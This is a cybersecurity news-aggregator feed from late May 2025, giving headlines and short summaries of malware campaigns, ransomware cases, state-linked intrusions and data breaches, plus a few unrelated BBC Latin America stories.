2025-05-28 https://thehackernews.com/2025/05/mimo-hackers-exploit-cve-2025-32432-in.html
A financially motivated threat actor has been observed exploiting a recently disclosed remote code execution flaw affecting the Craft Content Management System (CMS) to deploy multiple payloads, including a cryptocurrency miner, a loader dubbed Mimo Loader, and residential proxyware. The vulnerability in question is CVE-2025-32432, a maximum severity flaw in Craft CMS that was patched in

Autosummary: The threat activity has been attributed to an intrusion set dubbed Mimo (aka Mimo), which is believed to be active since March 2022, previously relying on vulnerabilities in Apache Log4j (CVE-2021-44228), Atlassian Confluence (CVE-2022-26134), PaperCut (CVE-2023-27350), and Apache ActiveMQ (CVE-2023-46604) to deploy the miner.


251 Amazon-Hosted IPs Used in Exploit Scan Targeting ColdFusion, Struts, and Elasticsearch

exploits industry
2025-05-28 https://thehackernews.com/2025/05/251-amazon-hosted-ips-used-in-exploit.html
Cybersecurity researchers have disclosed details of a coordinated cloud-based scanning activity that targeted 75 distinct "exposure points" earlier this month. The activity, observed by GreyNoise on May 8, 2025, involved as many as 251 malicious IP addresses that are all geolocated to Japan and hosted by Amazon. "These IPs triggered 75 distinct behaviors, including CVE exploits,



Crooks use a fake antivirus site to spread Venom RAT and a mix of malware

exploits
2025-05-28 https://securityaffairs.com/178366/malware/fake-antivirus-spreads-venom-rat.html
Researchers found a fake Bitdefender site spreading the Venom RAT by tricking users into downloading it as antivirus software. DomainTools Intelligence (DTI) researchers warn of a malicious campaign using a fake website (“bitdefender-download[.]com”) spoofing Bitdefender’s Antivirus for Windows download page to trick visitors into downloading a remote access trojan called Venom RAT. “A malicious campaign […]

Autosummary: “This research examines the attackers’ methods, such as deceptive websites and command infrastructure, indicating a clear intent to target individuals for financial gain by compromising their credentials, crypto wallets, and potentially selling access to their systems.”


Iranian Man pleaded guilty to role in Robbinhood Ransomware attacks

exploits ransomware
2025-05-28 https://securityaffairs.com/178358/breaking-news/iranian-man-pleaded-guilty-to-role-in-robbinhood-ransomware-attacks.html
Iranian man pleads guilty to role in Baltimore ransomware attack tied to Robbinhood, admitting to computer and wire fraud conspiracy. Iranian national Sina Gholinejad pleaded guilty to his role in a Robbinhood ransomware scheme that hit U.S. cities, including Baltimore and Greenville. The attacks caused major disruptions and over $19 million in damages to Baltimore […]

Autosummary: “Gholinejad and his co-conspirators — all of whom were overseas — caused tens of millions of dollars in losses and disrupted essential public services by deploying the Robbinhood ransomware against U.S. cities, health care organizations, and businesses,” said Matthew R. Galeotti, Head of the Justice Department’s Criminal Division.


Czechia blames China for Ministry of Foreign Affairs cyberattack

ciber
2025-05-28 https://www.bleepingcomputer.com/news/security/czechia-blames-china-for-ministry-of-foreign-affairs-cyberattack/
The Czech Republic says the Chinese-backed APT31 hacking group was behind cyberattacks targeting the country's Ministry of Foreign Affairs and critical infrastructure organizations. [...]

Autosummary: "The malicious activity, which lasted from 2022 and affected an institution designated as Czech critical infrastructure, was perpetrated by the cyberespionage actor APT31 that is publicly associated with the Ministry of State Security," the Czech government said.


New warning issued over toll fee scams

financial
2025-05-28 https://www.malwarebytes.com/blog/news/2025/05/new-warning-issued-over-toll-fee-scams
A renewed warning about toll fee scams has gone out. This time it comes from the DMVs of several US states.

Autosummary: Now the Departments of Motor Vehicles (DMVs) of New York, Florida, and California are warning residents not to fall for the text message scams that try to trick users into clicking a link by telling them they owe a “small amount” in toll fees.


New PumaBot Botnet Targets Linux IoT Devices to Steal SSH Credentials and Mine Crypto

industry Linux
2025-05-28 https://thehackernews.com/2025/05/new-pumabot-botnet-targets-linux-iot.html
Embedded Linux-based Internet of Things (IoT) devices have become the target of a new botnet dubbed PumaBot. Written in Go, the botnet is designed to conduct brute-force attacks against SSH instances to expand in size and scale and deliver additional malware to the infected hosts. "Rather than scanning the internet, the malware retrieves a list of targets from a command-and-control (C2) server

Autosummary: Darktrace said its analysis of the campaign uncovered other related binaries that are said to be deployed as part of a broader campaign:
- ddaemon, a Go-based backdoor which retrieves the binary "networkxm" into "/usr/src/bao/networkxm" and executes the shell script "installx.sh"
- networkxm, an SSH brute-force tool that functions similarly to the botnet's initial stage by fetching a password list from a C2 server and attempting to connect via SSH across a list of target IP addresses
- installx.sh, which is used to retrieve another shell script "jc.sh" from "1.lusyn[.]xyz," grant it read, write, and execute permissions for all access levels, run the script, and clear bash history
- jc.sh, which is configured to download a malicious "pam_unix.so" file from an external server and use it to replace the legitimate counterpart installed on the machine, as well as retrieve and run another binary named "1" from the same server
- pam_unix.so, which acts as a rootkit that steals credentials by intercepting successful logins and writing them to the file "/usr/bin/con.txt"
- 1, which is used to monitor for the file "con.txt" being written or moved to "/usr/bin/" and then exfiltrate its contents to the same server
Given that the SSH brute-force capabilities of the botnet malware lend it worm-like capabilities, users are required to keep an eye out for anomalous SSH login activity, particularly failed login attempts, audit systemd services regularly, review authorized_keys files for the presence of unknown SSH keys, apply strict firewall rules to limit exposure, and filter HTTP requests with non-standard headers, such as X-API-KEY: jieruidashabi.


New PumaBot targets Linux IoT surveillance devices

industry Linux
2025-05-28 https://securityaffairs.com/178386/malware/pumabot-targets-linux-iot-devices.html
PumaBot targets Linux IoT devices, using SSH brute-force attacks to steal credentials, spread malware, and mine crypto. Darktrace researchers discovered a new botnet called PumaBot targets Linux-based IoT devices, using SSH brute-force attacks to steal credentials, spread malware, and mine cryptocurrency. PumaBot skips broad internet scans and instead pulls a list of targets from its […]

Autosummary: PumaBot targets Linux IoT devices, using SSH brute-force attacks to steal credentials, spread malware, and mine crypto. “While it does not appear to propagate automatically like a traditional worm, it does maintain worm-like behavior by brute-forcing targets, suggesting a semi-automated botnet campaign focused on device compromise and long-term access.”


German court rejects Peruvian farmer's landmark climate case

latam
2025-05-28 https://www.bbc.com/news/articles/c5y5lwveqzno
Saúl Luciano Lliuya believes energy giant RWE should be held responsible for melting glaciers.

Autosummary: He said that as a result, Lake Palcacocha - which is located above the city - now has four times as much water than in 2003 and that residents like him were at risk of flooding, especially if blocks of ice were to break off from Palcacocha glacier and fall into the lake, causing it to overflow.


Interlock ransomware gang deploys new NodeSnake RAT on universities

exploits ransomware
2025-05-28 https://www.bleepingcomputer.com/news/security/interlock-ransomware-gang-deploys-new-nodesnake-rat-on-universities/
The Interlock ransomware gang is deploying a previously undocumented remote access trojan (RAT) named NodeSnake against educational institutes for persistent access to corporate networks. [...]

Autosummary: (Figure: Gathering system data. Source: QuorumCyber) The malware can kill active processes or load additional EXE, DLL, or JavaScript payloads on the device.


Fake AI video generator tools lure in Facebook and LinkedIn users to deliver malware

exploits
2025-05-28 https://www.malwarebytes.com/blog/news/2025/05/fake-ai-video-generator-tools-lure-in-facebook-and-linkedin-users-to-deliver-malware
Cybercriminals are using text-to-video-AI tools to lure victims to fake websites that deliver malware like infostealers and Trojans.

Autosummary: According to researchers at Mandiant, the criminals are setting up websites claiming to offer “AI video generator” services, and then using those fake tools to distribute information stealers, Trojans, and backdoors. Look out for ads with too-good-to-be-true offers, urgent deadlines, or unusual payment methods like cryptocurrency or wire transfers.


Iranian Hacker Pleads Guilty in $19 Million Robbinhood Ransomware Attack on Baltimore

exploits ransomware
2025-05-28 https://thehackernews.com/2025/05/iranian-hacker-pleads-guilty-in-19.html
An Iranian national has pleaded guilty in the U.S. over his involvement in an international ransomware and extortion scheme involving the Robbinhood ransomware. Sina Gholinejad (aka Sina Ghaaf), 37, and his co-conspirators are said to have breached the computer networks of various organizations in the United States and encrypted files with Robbinhood ransomware to demand Bitcoin ransom payments.



Czech Republic Blames China-Linked APT31 Hackers for 2022 Cyberattack

ciber
2025-05-28 https://thehackernews.com/2025/05/czech-republic-blames-china-linked.html
The Czech Republic on Wednesday formally accused a threat actor associated with the People's Republic of China (PRC) of targeting its Ministry of Foreign Affairs. In a public statement, the government said it identified China as the culprit behind a malicious campaign targeting one of the unclassified networks of the Czech Ministry of Foreign Affairs. The extent of the breach is presently not

Autosummary: The attack has been attributed to a state-sponsored threat actor tracked as APT31, which also overlaps with threat clusters known as Altaire, Bronze Vinewood, Judgement Panda, PerplexedGoblin, RedBravo, Red Keres, and Violet Typhoon (formerly Zirconium).


Czech Republic accuses China’s APT31 of a cyberattack on its Foreign Ministry

ciber
2025-05-28 https://securityaffairs.com/178399/apt/czech-republic-accuses-chinas-apt31-of-a-cyberattack-on-its-foreign-ministrys-unclassified-network.html
The Czech government condemned China after linking cyber espionage group APT31 to a cyberattack on its critical infrastructure. The Czech government strongly condemned China after the cyber espionage group APT31 was linked to a cyberattack targeting the nation’s critical infrastructure. The Czech government condemned China after APT31 hackers infiltrated a ministry’s unclassified system in 2022 […]

Autosummary: China-linked cyberespionage group APT31 (aka Zirconium, Judgment Panda, and Red Keres) was involved in multiple cyber espionage operations; it made the headlines in 2022 after the Check Point Research team discovered that the group used a tool dubbed Jian, which is a clone of the NSA Equation Group’s “EpMe” hacking tool, years before it was leaked online by the Shadow Brokers hackers. APT31, also known as Zirconium or Judgment Panda, has been operational for more than a decade, stealing diplomatic cables, industrial designs, and political strategy documents from Europe, North America, and Asia.


APT41 malware abuses Google Calendar for stealthy C2 communication

exploits
2025-05-28 https://www.bleepingcomputer.com/news/security/apt41-malware-abuses-google-calendar-for-stealthy-c2-communication/
The Chinese APT41 hacking group uses a new malware named "ToughProgress" that abuses Google Calendar for command-and-control (C2) operations, hiding malicious activity behind a trusted cloud service. [...]

Autosummary: (Figure: Overview of the APT41 attack flow. Source: Google) The attack starts with a malicious email sent to targets, linking to a ZIP archive hosted on a previously compromised government website.


Smashing Security podcast #419: Star Wars, the CIA, and a WhatsApp malware mirage

exploits
2025-05-28 https://grahamcluley.com/smashing-security-podcast-419/
Why is a cute Star Wars fan website now redirecting to the CIA? How come Cambodia has become the world's hotspot for scam call centres? And can a WhatsApp image really drain your bank account with a single download, or is it just a load of hacker hokum? All this and much more is discussed in the latest edition of the award-winning "Smashing Security" podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by Allan Liska.

Autosummary: Hosts: Graham Cluley: @grahamcluley.com @[email protected]; Carole Theriault: @caroletheriault. Guest: Allan Liska – @ransomwaresommelier.com. Episode links: Sponsored by: Vanta – Expand the scope of your security program with market-leading compliance automation… while saving time and money.


Chile's salmon farms hope for calmer waters

latam
2025-05-28 https://www.bbc.com/news/articles/cd9003z9nzjo
Chilean salmon producers are being criticised for operating in some of the country's national parks.

Autosummary: Jane Chambers, Business reporter, reporting from Puerto Montt, Chile. Chile has 1,343 offshore salmon farms scattered up and down the coast in the south of the country. Chile is the world's second-largest exporter of farmed salmon, and the biggest supplier to the US. Regarding salmon farming in national reserves, he says that is a different environment which, according to Chilean law and the rules and regulations they follow, they can operate in.


Brazil sues China carmaker BYD over "slave-like" conditions

latam
2025-05-28 https://www.bbc.com/news/articles/c3v5n7w55kpo
The Public Labour Prosecutor's Office in the state of Bahia says 220 Chinese workers were rescued.

Autosummary: Brazilian prosecutors are suing Chinese electric vehicle (EV) giant BYD and two of its contractors, saying they were responsible for human trafficking and conditions "analogous to slavery" at a factory construction site in the country.


How AI agents reshape industrial automation and risk management

industry
2025-05-27 https://www.helpnetsecurity.com/2025/05/27/michael-metzler-siemens-ai-agents-industrial-environments/

In this Help Net Security interview, Michael Metzler, Vice President Horizontal Management Cybersecurity for Digital Industries at Siemens, discusses the cybersecurity implications of deploying AI agents in industrial environments. He talks about the risks that come with AI agents making semi-autonomous decisions, and why a layered security approach like Defense-in-Depth is key to keeping industrial systems safe. What are the implications of an AI agent being compromised in a critical infrastructure environment, such as an … More

The post How AI agents reshape industrial automation and risk management appeared first on Help Net Security.


Autosummary: The Defense-in-Depth concept considers all essential security factors, including physical access protection for manufacturing sites, organizational and technical measures to protect production networks and control systems from unauthorized access, espionage, and manipulation. He talks about the risks that come with AI agents making semi-autonomous decisions, and why a layered security approach like Defense-in-Depth is key to keeping industrial systems safe. Well-implemented security measures such as continuous verification, appropriate access controls, and behavioral analytics enable organizations to effectively utilize AI capabilities while maintaining operational safety and security.


Cybersecurity jobs available right now: May 27, 2025

ciber
2025-05-27 https://www.helpnetsecurity.com/2025/05/27/cybersecurity-jobs-available-right-now-may-27-2025/

Application Security Engineer, SDO AppSec Amazon | EMEA | Hybrid – View job details As an Application Security Engineer, SDO AppSec, you will be responsible for creating, updating, and maintaining threat models across a diverse range of software projects. Part of your role will involve developing security automation tools to enhance efficiency and consistency. You will perform adversarial security analysis, leveraging tools to complement manual testing efforts. CISO AudioCodes | Israel | Hybrid – View … More

The post Cybersecurity jobs available right now: May 27, 2025 appeared first on Help Net Security.


Autosummary:
Manager, Information Security Risk | Acrisure | USA | On-site – View job details. As a Manager, Information Security Risk, you will conduct comprehensive third party risk assessments, analyzing security policies, procedures, controls, and compliance with regulatory requirements.
Cybersecurity Analyst I, Applications | The University of British Columbia | Canada | Hybrid – View job details. As a Cybersecurity Analyst I, Applications, you will design, implement, configure and manage application security solutions based on business, security, and privacy needs.
Senior Cyber Security Engineer – Software Development | JLR | Ireland | Hybrid – No longer accepting applications. As a Senior Cyber Security Engineer – Software Development, you will design, implement, and maintain software applications related to security functionalities such as crypto key management, HSM APIs, secure logging, and firewalls.
Information Security Director | Sycurio | United Kingdom | Hybrid – View job details. As an Information Security Director, you will develop, maintain, and expand the information security management system (‘ISMS’) in line with, and optimising compliance for, ISO27001, PCI-DSS and SOC2.
NOC Analyst | The Guitar Center Company | USA | On-site – View job details. As a NOC Analyst, you will monitor operational systems, networks, and applications to ensure availability, performance, and security.


Russia-Linked Hackers Target Tajikistan Government with Weaponized Word Documents

government
2025-05-27 https://thehackernews.com/2025/05/russia-linked-hackers-target-tajikistan.html
The Russia-aligned threat actor known as TAG-110 has been observed conducting a spear-phishing campaign targeting Tajikistan using macro-enabled Word templates as an initial payload. The attack chain is a departure from the threat actor's previously documented use of an HTML Application (.HTA) loader dubbed HATVIBE, Recorded Future's Insikt Group said in an analysis. "Given TAG-110's historical

Autosummary: "However, based on TAG-110's historical activity and tool set, it is likely that successful initial access via the macro-enabled templates would result in the deployment of additional malware, such as HATVIBE, CHERRYSPY, LOGPIE, or potentially a new, custom-developed payload designed for espionage operations," the company said.


Russian Void Blizzard cyberspies linked to Dutch police breach

rusia-ucrania
2025-05-27 https://www.bleepingcomputer.com/news/security/russian-void-blizzard-cyberspies-linked-to-dutch-police-breach/
A previously unknown Russian-backed cyberespionage group now tracked as Void Blizzard has been linked to a September 2024 Dutch police security breach. [...]

Autosummary: "Void Blizzard's cyberespionage operations tend to be highly targeted at specific organizations of interest to the Russian government, including in government, defense, transportation, media, non-governmental organizations (NGOs), and healthcare sectors primarily in Europe and North America," Microsoft said in a Tuesday report.


Adidas warns of data breach after customer service provider hack

financial Telcos
2025-05-27 https://www.bleepingcomputer.com/news/security/adidas-warns-of-data-breach-after-customer-service-provider-hack/
German sportswear giant Adidas disclosed a data breach after attackers hacked a customer service provider and stole some customers' data. [...]



Hackers Are Calling Your Office: FBI Alerts Law Firms to Luna Moth’s Stealth Phishing Campaign

financial
2025-05-27 https://thehackernews.com/2025/05/hackers-are-calling-your-office-fbi.html
The U.S. Federal Bureau of Investigation (FBI) has warned of social engineering attacks mounted by a criminal extortion actor known as Luna Moth targeting law firms over the past two years. The campaign leverages "information technology (IT) themed social engineering calls, and callback phishing emails, to gain remote access to systems or devices and steal sensitive data to extort the victims,"

Autosummary: Luna Moth, also called Chatty Spider, Silent Ransom Group (SRG), Storm-0252, and UNC3753, is known to be active since at least 2022, primarily employing a tactic called callback phishing or telephone-oriented attack delivery (TOAD) to trick unsuspecting users into calling phone numbers listed in benign-looking phishing emails related to invoices and subscription payments.


Nova Scotia Power confirms it was hit by ransomware attack but hasn’t paid the ransom

exploits ransomware
2025-05-27 https://securityaffairs.com/178323/data-breach/nova-scotia-power-confirms-it-was-hit-by-ransomware-but-hasnt-paid-the-ransom.html
Nova Scotia Power confirms it was hit by a ransomware attack but hasn’t paid the ransom, nearly a month after first disclosing the cyberattack. Nova Scotia Power confirmed it was hit by a ransomware attack nearly a month after disclosing a cyber incident. The company revealed it hasn’t paid the ransom. Nova Scotia Power Inc. is […]

Autosummary: The impacted personal information varies by customer and could include different types depending on what each customer provided, including name, phone number, email address, mailing and service addresses, Nova Scotia Power program participation information, date of birth, and customer account history (such as power consumption, service requests, customer payment, billing, and credit history, and customer correspondence), driver’s license number, and Social Insurance Number. Its operations encompass generation, transmission, and distribution of electricity, utilizing a diverse mix of energy sources including coal, natural gas, hydroelectric, wind, tidal, oil, and biomass.


Not Every CVE Deserves a Fire Drill: Focus on What’s Exploitable

exploits
2025-05-27 https://www.bleepingcomputer.com/news/security/not-every-cve-deserves-a-fire-drill-focus-on-whats-exploitable/
Not every "critical" vulnerability is a critical risk. Picus Exposure Validation cuts through the noise by testing what's actually exploitable in your environment — so you can patch what matters. [...]

Autosummary: That shift saves hours of patching, clears out the noise, and most importantly, lets security teams focus more effectively on real threats and stop chasing ghosts. This post breaks down why traditional vulnerability prioritization often leads you astray, and how a better approach, exposure validation, helps teams focus on what’s truly exploitable. It’s like running safe, controlled attack simulations, using real-world adversarial techniques, to see if the entire kill chain of the exploitation campaign works on you. Now it’s time to check your security stack: cloud controls, network protections, endpoint tools, and SIEM rules. However, in your real-world environment, this vuln would be blocked and detected, letting you deal with far more critical vulnerabilities to your org. And many tools, scanners, patching platforms, and dashboards still sort them by raw CVSS or EPSS scores.


MATLAB dev confirms ransomware attack behind service outage

exploits ransomware
2025-05-27 https://www.bleepingcomputer.com/news/security/mathworks-blames-ransomware-attack-for-ongoing-outages/
MathWorks, a leading developer of mathematical computing and simulation software, has revealed that a recent ransomware attack is behind an ongoing service outage. [...]


Russian Hackers Breach 20+ NGOs Using Evilginx Phishing via Fake Microsoft Entra Pages

financial rusia-ucrania
2025-05-27 https://thehackernews.com/2025/05/russian-hackers-breach-20-ngos-using.html
Microsoft has shed light on a previously undocumented cluster of threat activity originating from a Russia-affiliated threat actor dubbed Void Blizzard (aka Laundry Bear) that it said is attributed to "worldwide cloud abuse." Active since at least April 2024, the hacking group is linked to espionage operations mainly targeting organizations that are important to Russian government objectives,

Autosummary: Active since at least April 2024, the hacking group is linked to espionage operations mainly targeting organizations that are important to Russian government objectives, including those in government, defense, transportation, media, non-governmental organizations (NGOs), and healthcare sectors in Europe and North America.


Iranian pleads guilty to RobbinHood ransomware attacks, faces 30 years

exploits ransomware
2025-05-27 https://www.bleepingcomputer.com/news/security/iranian-pleads-guilty-to-robbinhood-ransomware-attacks-faces-30-years/
An Iranian national has pleaded guilty to participating in the Robbinhood ransomware operation, which was used to breach the networks, steal data, and encrypt devices of U.S. cities and organizations in an attempt to extort millions of dollars over a five-year span. [...]


New Self-Spreading Malware Infects Docker Containers to Mine Dero Cryptocurrency

exploits
2025-05-27 https://thehackernews.com/2025/05/new-self-spreading-malware-infects.html
Misconfigured Docker API instances have become the target of a new malware campaign that transforms them into a cryptocurrency mining botnet. The attacks, designed to mine for Dero currency, are notable for their worm-like capabilities to propagate the malware to other exposed Docker instances and rope them into an ever-growing horde of mining bots. Kaspersky said it observed an unidentified threat

Autosummary: As a way of setting up persistence, the transferred "nginx" binary is added to the "/root/.bash_aliases" file to make sure that it automatically launches upon shell login.


DragonForce ransomware abuses SimpleHelp in MSP supply chain attack

exploits ransomware
2025-05-27 https://www.bleepingcomputer.com/news/security/dragonforce-ransomware-abuses-simplehelp-in-msp-supply-chain-attack/
The DragonForce ransomware operation successfully breached a managed service provider and used its SimpleHelp remote monitoring and management (RMM) platform to steal data and deploy encryptors on downstream customers' systems. [...]

Autosummary: The report by Sophos says that the threat actors first used SimpleHelp to perform reconnaissance on customer systems, such as collecting information about the MSP's customers, including device names and configuration, users, and network connections.


Adidas customers’ personal information at risk after data breach

financial
2025-05-27 https://www.bitdefender.com/en-us/blog/hotforsecurity/adidas-customers-personal-information-at-risk-after-data-breach
Lovers of Adidas clothes would be wise to be on their guard against phishing attacks, after the German sportswear giant revealed that a cyber attack had exposed the personal information of customers. Read more in my article on the Hot for Security blog.

Autosummary: As Bleeping Computer reports, earlier this month Adidas did disclose that customers in Turkey and South Korea who had contacted its customer service centre had had their contact information (including names, email addresses, phone numbers, dates of birth, and postal addresses) stolen.


Cybercriminals Clone Antivirus Site to Spread Venom RAT and Steal Crypto Wallets

ciber
2025-05-27 https://thehackernews.com/2025/05/cybercriminals-clone-antivirus-site-to_4.html
Cybersecurity researchers have disclosed a new malicious campaign that uses a fake website advertising antivirus software from Bitdefender to dupe victims into downloading a remote access trojan called Venom RAT. The campaign indicates a "clear intent to target individuals for financial gain by compromising their credentials, crypto wallets, and potentially selling access to their systems," the

Autosummary: "Utilizing state-of-the-art tactics such as polymorphic identifiers, advanced man‑in‑the‑middle proxy mechanisms and multi-factor authentication bypass techniques, the attackers aim to harvest credentials and two-factor authentication (2FA) codes, enabling real-time access to social media accounts," the KnowBe4 Threat Lab said in a report.


DefectDojo’s SOC capabilities simplify cybersecurity operations

ciber
2025-05-27 https://www.helpnetsecurity.com/2025/05/27/defectdojo-soc-capabilities/

DefectDojo announced next-gen Security Operations Center (SOC) capabilities for DefectDojo Pro, which provides both SOC and AppSec professionals a unified platform for noise reduction and prioritization of SOC alerts and AppSec findings. As both SOC and AppSec teams attempt to cut through noisy data from a sprawling set of tools and sources, Dojo Pro now allows two security teams to work from the same platform. SOC teams, like their counterparts in AppSec, are facing a … More

Autosummary: These include the Rules Engine, which enables teams to customize rules to automatically manipulate, edit, enhance, add custom remediation advice, escalate, or de-escalate specific findings, all without significant human effort; the universal parser, allowing for data ingestion from any tool producing JSON or XML data; and next-generation prioritization evaluation.


Why layoffs increase cybersecurity risks

ciber
2025-05-26 https://www.helpnetsecurity.com/2025/05/26/layoffs-cybersecurity-risks/

A wave of layoffs has swept through the tech industry, leaving IT teams in a rush to revoke all access those employees may have had. Additionally, 54% of tech hiring managers say their companies are likely to conduct layoffs within the next year, and 45% say employees whose roles can be replaced by AI are most likely to be let go, according to General Assembly. Taking away access to company data the moment someone leaves … More

Autosummary: The types of data that can be extracted: client/customer data, company confidential data, employee HR data, financial data, sensitive project files, source code, and unreleased or sensitive marketing. Lack of monitoring during workforce transitions: during large-scale layoffs, teams often cannot cover all aspects of offboarding alongside their regular duties. Mitigation strategies for safer offboarding: revoke access to user accounts, systems, applications, and networks.


NIST proposes new metric to gauge exploited vulnerabilities

exploits
2025-05-26 https://www.helpnetsecurity.com/2025/05/26/nist-likely-exploited-vulnerabilities/

NIST has introduced a new way to estimate which software vulnerabilities have likely been exploited, and it’s calling on the cybersecurity community to help improve and validate the method. The new metric, “Likely Exploited Vulnerabilities” (LEV), aims to close a key gap in vulnerability management: identifying which of the thousands of reported flaws each year are actually being used in real-world attacks. Organizations typically rely on two main tools for this: the Exploit Prediction Scoring … More

Autosummary: It’s a statistical estimate, not a confirmation, which is why the whitepaper emphasizes that LEV is meant to augment, not replace, existing methods. The new metric, “Likely Exploited Vulnerabilities” (LEV), aims to close a key gap in vulnerability management: identifying which of the thousands of reported flaws each year are actually being used in real-world attacks. For now, it works best with CVEs published after March 2023, when EPSS version 3, the most accurate to date, was introduced.


⚡ Weekly Recap: APT Campaigns, Browser Hijacks, AI Malware, Cloud Breaches and Critical CVEs

exploits
2025-05-26 https://thehackernews.com/2025/05/weekly-recap-apt-campaigns-browser.html
Cyber threats don't show up one at a time anymore. They’re layered, planned, and often stay hidden until it’s too late. For cybersecurity teams, the key isn’t just reacting to alerts—it’s spotting early signs of trouble before they become real threats. This update is designed to deliver clear, accurate insights based on real patterns and changes we can verify. With today’s complex systems, we

Autosummary: This week's list includes — CVE-2025-34025, CVE-2025-34026, CVE-2025-34027 (Versa Concerto), CVE-2025-30911 (RomethemeKit For Elementor WordPress plugin), CVE-2024-57273, CVE-2024-54780, and CVE-2024-54779 (pfSense), CVE-2025-41229 (VMware Cloud Foundation), CVE-2025-4322 (Motors WordPress theme), CVE-2025-47934 (OpenPGP.js), CVE-2025-30193 (PowerDNS), CVE-2025-0993 (GitLab), CVE-2025-36535 (AutomationDirect MB-Gateway), CVE-2025-47949 (Samlify), CVE-2025-40775 (BIND DNS), CVE-2025-20152 (Cisco Identity Services Engine), CVE-2025-4123 (Grafana), CVE-2025-5063 (Google Chrome), CVE-2025-37899 (Linux Kernel), CVE-2025-26817 (Netwrix Password Secure), CVE-2025-47947 (ModSecurity), CVE-2025-3078, CVE-2025-3079 (Canon Printers), and CVE-2025-4978 (NETGEAR). According to court documents, Council used his personal computer to search incriminating phrases such as "SECGOV hack," "telegram sim swap," "how can I know for sure if I am being investigated by the FBI," "What are the signs that you are under investigation by law enforcement or the FBI even if you have not been contacted by them," "what are some signs that the FBI is after you," "Verizon store list," "federal identity theft statute," and "how long does it take to delete telegram account." "The DBatLoader malware distributed through phishing emails has the cunning behavior of exploiting normal processes (easinvoker.exe, loader.exe) through techniques such as DLL side-loading and injection for most of its behaviors, and it also utilizes normal processes (cmd.exe, powershell.exe, esentutl.exe, extrac32.exe) for behaviors such as file copying and changing policies," the company said.
Microsoft Announces Availability of Quantum-Resistant Algorithms to SymCrypt — Microsoft has revealed that it's making post-quantum cryptography (PQC) capabilities, including ML-KEM and ML-DSA, available for Windows Insiders, Canary Channel Build 27852 and higher, and Linux, SymCrypt-OpenSSL version 1.9.0. Over 100 Google Chrome Extensions Mimic Popular Tools — An unknown threat actor has been attributed to creating several malicious Chrome Browser extensions since February 2024 that masquerade as seemingly benign utilities such as DeepSeek, Manus, DeBank, FortiVPN, and Site Stats but incorporate covert functionality to exfiltrate data, receive commands, and execute arbitrary code. While the extensions appear to offer the advertised features, they also stealthily facilitate credential and cookie theft, session hijacking, ad injection, malicious redirects, traffic manipulation, and phishing via DOM manipulation. Another Russian hacking group, Gamaredon, remained the most prolific actor targeting the East European nation, enhancing malware obfuscation and introducing PteroBox, a file stealer leveraging Dropbox.
— The Russia-aligned Sandworm group intensified destructive operations against Ukrainian energy companies, deploying a new wiper named ZEROLOT. "The adopted mechanism will allow, using modern technologies, to strengthen control in the field of migration and will also contribute to reducing the number of violations and crimes in this area," Vyacheslav Volodin, chairman of the State Duma, said. "Threat actors may have accessed client secrets for Commvault's (Metallic) Microsoft 365 (M365) backup software-as-a-service (SaaS) solution, hosted in Azure," CISA said.
— The Dutch government has approved a law criminalizing a wide range of espionage activities, including digital espionage, in an effort to protect national security, critical infrastructure, and high-quality technologies.


China-linked APT UNC5221 started exploiting Ivanti EPMM flaws shortly after their disclosure

exploits
2025-05-26 https://securityaffairs.com/178285/apt/china-linked-apt-unc5221-started-exploiting-ivanti-epmm-flaws-shortly-after-their-disclosure.html
China-linked APT exploits Ivanti EPMM flaws to target critical sectors across Europe, North America, and Asia-Pacific, according to EclecticIQ. Researchers from EclecticIQ observed a China-linked APT group that chained two Ivanti EPMM flaws, tracked as CVE-2025-4427 and CVE-2025-4428, in attacks against organizations in Europe, North America, and Asia-Pacific. Below is the description of the flaws: […]

Autosummary: After breaching the system, they used hardcoded MySQL credentials, stored insecurely in system files, to access the database, which contains sensitive information like mobile device data (IMEI, SIM, location), LDAP user details, and Office 365 tokens.


Marlboro-Chesterfield Pathology data breach impacted 235,911 individuals

financial
2025-05-26 https://securityaffairs.com/178295/data-breach/marlboro-chesterfield-pathology-data-breach-impacted-235911-individuals.html
SafePay ransomware hit Marlboro-Chesterfield Pathology, stealing personal data of 235,000 people in a major breach at the North Carolina-based lab. Marlboro-Chesterfield Pathology (MCP), founded in 1990 in Pinehurst, NC, is a full-service lab offering molecular, cytology, and pathology testing. Known […]

Autosummary: Marlboro-Chesterfield Pathology disclosed that the breach exposed personal details such as names, addresses, birth dates, medical treatment information, and health insurance data, including policy numbers.


Brazil "best team in the world" - new boss Ancelotti

latam
2025-05-26 https://www.bbc.com/sport/football/articles/c5y5jnq4v13o
New Brazil coach Carlo Ancelotti says he is "honoured and proud to lead the best team in the world" and targets winning the 2026 World Cup.


Argentina's Cabrera wins second senior major in seven days

latam
2025-05-26 https://www.bbc.com/sport/golf/articles/cd0l7y5v243o
Angel Cabrera wins the Senior PGA Championship at Congressional to secure his second senior major title in seven days.


Week in review: Trojanized KeePass allows ransomware attacks, cyber risks of AI hallucinations

exploits ransomware
2025-05-25 https://www.helpnetsecurity.com/2025/05/25/week-in-review-trojanized-keepass-allows-ransomware-attacks-cyber-risks-of-ai-hallucinations/

Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Trojanized KeePass opens doors for ransomware attackers A suspected initial access broker has been leveraging trojanized versions of the open-source KeePass password manager to set the stage for ransomware attacks, WithSecure researchers have discovered. AI hallucinations and their risk to cybersecurity operations AI systems can sometimes produce outputs that are incorrect or misleading, a phenomenon known as hallucinations. These errors … More

Autosummary: Why legal must lead on AI governance before it’s too late In this Help Net Security interview, Brooke Johnson, Chief Legal Counsel and SVP of HR and Security, Ivanti, explores the legal responsibilities in AI governance, highlighting how cross-functional collaboration enables safe, ethical AI use while mitigating risk and ensuring compliance. Closing security gaps in multi-cloud and SaaS environments In this Help Net Security interview, Kunal Modasiya, SVP, Product Management, GTM, and Growth at Qualys, discusses recent Qualys research on the state of cloud and SaaS security. The hidden gaps in your asset inventory, and how to close them In this Help Net Security interview, Tim Grieveson, CSO at ThingsRecon, breaks down the first steps security teams should take to regain visibility, the most common blind spots in asset discovery, and why context should drive risk prioritization.


Hackers Use Fake VPN and Browser NSIS Installers to Deliver Winos 4.0 Malware

exploits
2025-05-25 https://thehackernews.com/2025/05/hackers-use-fake-vpn-and-browser-nsis.html
Cybersecurity researchers have disclosed a malware campaign that uses fake software installers masquerading as popular tools like LetsVPN and QQ Browser to deliver the Winos 4.0 framework. The campaign, first detected by Rapid7 in February 2025, involves the use of a multi-stage, memory-resident loader called Catena. "Catena uses embedded shellcode and configuration switching logic to stage

